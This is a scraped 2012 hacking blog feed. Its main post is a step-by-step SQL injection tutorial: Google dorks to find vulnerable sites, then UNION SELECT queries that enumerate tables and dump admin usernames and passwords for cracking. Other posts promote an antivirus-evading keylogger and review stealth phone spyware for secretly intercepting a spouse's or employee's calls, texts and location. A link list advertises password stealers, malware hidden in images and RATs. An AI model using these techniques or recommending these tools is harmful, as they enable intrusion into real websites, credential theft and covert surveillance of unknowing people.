Enjoy Iphone HaCkInG.........

Website Hacking : How to find a vulnerable Website?? Part 2

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 06:35:04 PST

As we had discussed about basic information of website hacking in my last article on wildhacker. Today i am writing article on "How to find a vulnerable Website using Dork???" Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.

Today in this article, I am going to teach you how to find website vulnerablility using Dork. Here i have shared some Dorks which you can use to fine vulnerable Website through google.

If you have not read part 1 I strongly recommend you do: Basic Information About Website Hacking Part 1

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

How to find a vulnerable Website Using Dork?

What is an SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

How do I know if the site is vulnerable?

Well, the most basic way to do it, and the easiest, would be to use an SQLi Scanner, such as Acunetix Web Vulnerability Scanner

Alternatively, you can search manually using something called a "Dork".

So what is a dork?

A dork is a simple search used on google ( or other search engines ) that brings up sites you are specifically looking for.

List of Google Dork:

inurl:gallery.php?id=

inurl:pages.php?id=

inurl:post.php?id=

inurl:view.php?id=

inurl:source.php?id=

inurl:index.php?id=

inurl:article?id=

Using the manual method will take a lot of trial and error.

Once you have your site, to check if it is vulnerable, simply add an apostrophe ( ' ) to the end of the url.

Example:
http://www.examplesite.com/category.php?id=5'

If the site is vulnerable, you will see the following error or something similar somewhere on the page.

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "

If you get this, the site should be vulnerable. So far so good!

How many columns?

Our next step is to find the number of columns in the database. To do this we use the ORDER BY query. We get our normal site URL, and add ORDER BY 1-- to the end of it. Example:

Quote:
http://www.examplesite.com/category.php?id=5 order by 1--

The page should then show up as normal. Now we have to increase this number until we get an error.

Quote:
http://www.examplesite.com/category.php?id=5 order by 1-- No error
http://www.examplesite.com/category.php?id=5 order by 2-- No error
http://www.examplesite.com/category.php?id=5 order by 3-- Error

We got an error on 3, so that means our number of columns is 2 (The max column number before getting an error).

Union Select Query

We use the union select statement to combine the results of multiple querys in our SQLi. To test if it works, go to our sites normal URL, and write "union select 1,2--" (without quotes) after it. In our example, we use 1,2--, but on other sites, you will usually have a different number of columns. Example: On a site with 5 columns it would be "union select 1,2,3,4,5--".

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,2--

Notice that there is a - in front of the 5. This is done to remove all text from the webpage, so we can see the results of our query on the page (Explanation. There isn't a -5 page anywhere on the site, so it uses the usual site template, but without the images and text of that specific page).

If union select worked, we should have no SQL errors. We also should now see a few numbers on the page that normally aren't there. For our example, we will say that both 1 and 2 showed up on our page.

What SQL Version does my site use?

This will be one of the easier things to do. After we have tested union (and it works!) we simply input "version()" in to one of the numbers in our URL, but these numbers have to be visible on the page, otherwise we won't be able to see the returned query result. Example:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,version()--

This will replace the number 2 on our page with the SQL version. For our example we will use version 5 and above.

Finding table names

Now we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names. To do so, replace version() with group_concat(table_name). Then after your last column number, add from information_schema.tables--. Example:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(table_name) from information_schema.tables--

On the page you should now have a list of all the table names in the database.

Finding the column names

To find the column names we do the same thing, but replace tables with columns, but we include which table to get the column names from. If we found a table called admin. Example,

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--

Q: I get an error when I do this, or no column names are shown!

A: Magic quotes is on. To bypass this, you must convert the table name to Hex.
You can do this by going to http://www.swingnote.com/tools/texttohex.php . Our query would now look like this:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e --

Note: the 0x tells the computer the following string is in hex.

Lets say the column names were username and password.

Final Step: Getting our information.

To finish it off, we want to find out what the columns contain, otherwise, this has all been for nothing! To do so we get our normal site URL and add "union select 1,concat(username,0x3a,password) from admin--".

This will show the username and password from the table admin! Usually your password will be a hash, so you can use an online MD5 Cracker such as MD5Crack or use a program such as Cain and Abel to decrypt the password hash.

Keylogger: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from wildhacker.

So friends, I hope you will like this
How to find a vulnerable Website tutorial.
I have personally tested this dorks and found all are working. If you have any problem in above article, please mention it in comments section.

Enjoy Website Hacking ........

Hack Website : Basic Information About Website Hacking Part 1

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 06:31:04 PST

Well I have posted lots of articles on Email Hacking which includes Phishing and keylogging etc, but today I would like to throw some light on new topic which is "Website Hacking". Today i am first time writing article on "Website Hacking". why I am writing this article as there are lots of newbies having lots of misconceptions related hacking website, So I hope this tutorial cover all those misconception and if not all most of them.

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Basic Information About Website Hacking

What is a website hack?

The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.

A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.

Who are the hackers?

Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.

Why do they do it? What do they want?

What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!

To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:

Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.

Theft methods:
They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
They copy your customer database.
They install spyware or phishing pages in your site, to grab data as your customers log in.

Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
Your mail server, for sending spam.
Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
Free use of your server's processing power, to reprogram however they want.
Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.

Examples:

Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
Illegal pornographic content.
Use your webspace to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.

Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

SQL Injection
Cross Site Scripting (XSS)
Remote File Inclusion(RFI)
Local File inclusion(LFI)
Directory Traversal
Cross-site request forgery( CSRF )
SSI Injection
LDAP Injection
XPath Injection
Denial of Service - DOS Attacks

In this article, I have just shared basic information on Hacking Website. I hope you have liked the post uptill now, I will cover the method to hack website in the next post, So stay tuned !.

EnJoY HaCkInG....

Cellphone Hacking : How to Spy on Cell Phones

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 06:28:51 PST

Every day I get a lot of emails from people asking how to spy on cell phone or How to hack a cellphone. To spy on a given cell phone all you need to do is install a good cell phone spy software on the target cell phone and once you do this you can silently record every SMS and information about each call. You can also see GPS positions every thirty minutes.

Today, there exists hundreds of cell phone spy softwares on the market, where many of them are nothing more than a crap. Some are good and only a few of them are the best. Also, each SpyPhone software has a different set of features and operating format which makes it hard for novice users (perhaps like you) to make the right choice so as to fit their spying needs.

So, in order to help our readers to find the best spy software, I have decided to give a thorough review of the Top 2 Best Selling SpyPhone softwares on the market.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Iphone / Ipad Hack : Top 2 Best Hacking SpyPhone Softwares

There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy software's and based on the results we conclude Spy Phone GOLD and Mobile Spy as be the best one.

1. Spy Phone GOLD

2. Mobile Spy

SpyPhone GOLD and Mobile Spy are the current leaders in the market which are used by thousands across the globe to spy on cheating spouse, monitor employees and keep an eye on their teens. Here is a complete review of these two products.

1: Spy Phone GOLD

Spy Phone GOLD is one of the best spy software in the world which turns any compatible cell phone into a Spy Phone within minutes. It offers every feature that a true cell phone spy software should have. Hence most people choose Spy Phone GOLD for their cell phone spying needs.

How Cell Phone Spying Works?

After your purchase, you can directly download the installation module onto the target cell phone. Installation takes only a few minutes. After installation, each activity on the target phone is recorded and uploaded onto the SpyPhone servers. You can login to your online account from your PC to view the logs at any time. The logs contain Text messages, Contacts List, Call History, GPS Locations and many such information.

Call interception: When the target cell phone is on the conversation, you will receive a secret SMS notification on your phone. At this time you can call the target phone to listen to the live conversation going on. All this process takes place in complete stealth mode and is 100% undetectable!

Spy Phone Top Features:

Listen to Live Calls : Listen in real calls! Spyera Spyphone has “Call Interception” feature. By Call Interception you will be able to listen live calls happening on the target device. You will receive a secret SMS notification whenever your target start to have an phone conversation.

GPS Location Tracking : You can track them anywhere! For devices which has include integrated GPS feature, Spyera Spyphone will use GPS positioning to show the coordinates of the device, and its physical location upon a map inside your web account. It it even possible to configure the settings for real time updates, and to display a path of travel between certain time.

SMS Logging : Records both incoming & outgoing SMS

Multilingual : Spyera Spyphone supports all languages. The SMS logs, Emails, Address Book will always be displayed correctly when viewing the captured data.

Instant Download : Download Spyphone direclt into the device. Effortless Install. All Spyera products can direct download into device by using download URL. No computer or cable required!

SIM Change Notification : Get instant notification via SMS when the target cell phone changes it’s SIM

Spy from any location across the world.

Email relay (send data to your email).

100% Undetectable & 10 day money back guarantee.

Compatible Cell Phones:

Spy Phone GOLD is fully compatible with the following mobile phones

Apple iPhones
BlackBerry Phones
Nokia, LG, Samsung Phones
Sony Ericsson Phones
Windows Mobile Phones

Download Spy Phone GOLD Software

2: Mobile Spy

Although Mobile Spy Software is not as feature rich as Spy Phone GOLD Software, it also offers a good bunch of features that every spy software should have. It is a very good choice for those who are looking for a mid-range spy software at an affordable price.

How Cell Phone Spying Works?

Mobile Spy is a hybrid software/service which allows you to monitor your smartphone in real time. This unique system records the activities of anyone who uses your compatible iPhone, BlackBerry, Android, Windows Mobile or Symbian OS smartphone. You install a small application onto your phone. It starts at every boot of your phone but remains stealth and does not show up in the running process list.

After the software is setup on your phone it will record an array of phone activities and then silently upload the data to your private Mobile Spy account using the Internet. When you want to view results, simply login to the Online Control Panel from any computer and enter your username and password to proceed.

Mobile Spy Phone Top Features:

Calls Log : Each incoming and outgoing number is logged along with duration and time stamp.

SMS (Text Messages) Log : Every text message is logged even if the phone's logs are deleted. Includes full text.

GPS Locations Log : The device's current location is frequently logged using GPRS when signal available.

Web Site URLs Log : Each address visited in browser is logged. This feature is currently for iPhones only.

Log Summary : A summary of all activities can be shown along with separate viewers for each type.

100% Undetectable.

Compatible Cell Phones:

Spy Phone GOLD is fully compatible with the following mobile phones

Apple iPhones
BlackBerry Phones
Nokia, LG, Samsung Phones
Sony Ericsson Phones
Windows Mobile Phones

Download Mobile Spy Software

Comparison between Spy Phone GOLD and Mobile Spy :

Which Cell Phone Spy Software to Choose?

Its really depends upon your needs.If you want a High- tech Cellphone monitoring software i suggest you to go with Spy Phone Gold - is the right choice. Or else, if you’re looking for a mid-range spy software with basic features at an affordable price then go for Mobile Spy.

All of these softwares have 100% money back guarantee so you can try them with out any risk.So what are you waiting for? Go grab either of the two from the following links now:

Download Spy Phone GOLD Software

Download Mobile Spy Software

Enjoy Mobile HaCkiNg.........

Free Premium Downloading Rapidshare, HotFile, Wupload, Megaupload 2011

noreply@blogger.com (Niketan Patil) — Tue, 17 Jan 2012 23:17:26 PST

hello friends,in last month i had posted article on 25+ FREE RAPIDSHARE, MEGAUPLOAD, FILESONIC PREMIUM LINK GENERATORS 2011.Now I am back with a some more site which offer free Rapidshare, Hotfile, Megaupload,Fileserve , HotFile, FileSonic, FileFactory, Wupload,Megashares ,Oron, Netload, Megashares, 4shared, Easy-share, Depositfiles, Megaporn Premium Link Generator service plus Umlimited free download.

Most of the users asked me about how to download unlimited from fileserve and filesonic for free without having premium account. So friends this post is for you, by using these premium link generators site you can download unlimited from Rapidshare, Hotfile, Megaupload,Fileserve , HotFile, FileSonic, FileFactory, Wupload,Megashares ,Oron, Netload, Megashares, 4shared, Easy-share, Depositfiles, Megaporn Premium Link Generator service plus Umlimited free download with time limitations...

So, you just have to enter the file link and these sites will generate premium link for you. The sites offer different types of free premium download links. Some sites are Rapidshare premium link generators, while some are meant for meagupload and filesonic. I searched a lot for these sites and finally presenting you this new list.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Free Premium Link Generator HotFile, FileSonic, FileFactory, Wupload,Easy-share With Umlimited Downloading

Wild Hacker

Istealer Tutorial : Password Stealer To Hack Twitter / Facebook Account Password

Istealer Password stealer - hack email passwords:

Hack Password : Hack Paypal, Facebook, Hotmail Password Using URL

Hack Twitter Account and Facebook Account Password In One Click

File Extension Changing Tutorial! Make .exe Look Like a jpeg, mp3 or Whatever You Like!

How To Change File Extension

How to Protect WordPress Website From Hackers

How to Protect WordPress Blog/Website From Hackers

1) Use Open Source Scripts :

2) Use Strong Passwords :

3) Update Constantly :

5) Secure Admin Email Address :

6) Add a Database Table Prefix :

7) Password protect the Database :

8) Delete the Installation Folder :

9) Change File & Folder Permissions :

10) Use Secured FTP Access :

11) Restrict Root Access :

12) Ensure the presence of .htaccess file :

13) Add robots.txt file :

14) Use security plugins :

15) Read leading Tech Blogs :

16) Stay away from Nulled Scripts & Themes :

25+ free Rapidshare, Megaupload, Filesonic Premium Link Generators 2011

Rapidshare, Megaupload, Filesonic Premium Link Generators:

Hack Website : Local File Inclusion Tutorial(LFI) For Website Hacking Part 6

How To Hack Website Using Local File Inclusion(LFI)

How To Hack and Crack IDM

How To Unlock BlackBerry Cell Phones : Tutorial & Procedure

Unlock your BlackBerry Smart Phones in 3 Easy Steps

Step 1: Find Your BlackBerry Smart Phone Unlocking Model And Network

Step 2: Provide Information to Unlock Your BlackBerry Smart Phone

Click here to get Unlock Code for BlackBerry smart phone

Step 3: Enter the BlackBerry Unlock Code into Your BlackBerry Phone

If you want to unlock Iphone then click here

How To Hide Keylogger, Virus, Rats Files in Image - Steganography

How To Hide Keylogger, Virus, Rats Files in Image - Steganography

How to Hack Gmail Account Password Using Tabnabbing Jan 2012

Hack Gmail Account Password Using Tabnabbing Jan 2012

Sharecash Downloader 2012 : Bypass All ShareCash Surveys Easily

Sharecash Downloader : Bypass All ShareCash Surveys Easily

Hack Website : Remote File Inclusion Tutorial For Website Hacking Part 5

Remote File Inclusion Tutorial For Website Hacking

Tweaking and exploiting :

Email Hacking : Hack Facebook Password using Keylogger

Hack Password using Ardamax Keylogger

Password Hacking : How To Spread Your Viruses Successfully Over Internet

Email Password Hacking Software To Hack Hotmail/Gmail etc..

RAT(Remote Administration Tool) Guide For Beginners - FAQ

FAQ about RAT(Remote Administration Tool)

Protect Your Facebook, Gmail, Hotmail, Yahoo Accounts From Hackers Using Zemana Antilogger

Protect Your Computer, Facebook password,....

Free Wupload, Filesonic, Hotfile, Megaupload Premium Link Generator

Wupload Premium Link Generator :

Megaupload Premium Link Generator :

FileSonic Premium Link Generator :

Hotfile Premium Link Generator :

Website Hacking : The Cross-Site Request Forgery (CSRF/XSRF) FAQ

The Cross-Site Request Forgery (CSRF/XSRF) FAQ

Website Hacking : Cross Site Request Forgery (CSRF/XSRF) Tutorial Part 4

Cross Site Request Forgery Website Hacking Tutorial

WEBSITE HACKING : BASIC XSS TUTORIAL FOR WEBSITE HACKING PART : 3

Learn Website Hacking Using XSS....

Hack Iphone : Jailbreak or Unlock Iphone

Jailbreak or Unlock Iphone

Website Hacking : How to find a vulnerable Website?? Part 2

How to find a vulnerable Website Using Dork?

Hack Website : Basic Information About Website Hacking Part 1

Basic Information About Website Hacking

Cellphone Hacking : How to Spy on Cell Phones

Iphone / Ipad Hack : Top 2 Best Hacking SpyPhone Softwares

1: Spy Phone GOLD

How Cell Phone Spying Works?

Spy Phone Top Features:

Compatible Cell Phones:

2: Mobile Spy

How Cell Phone Spying Works?

Mobile Spy Phone Top Features:

Compatible Cell Phones: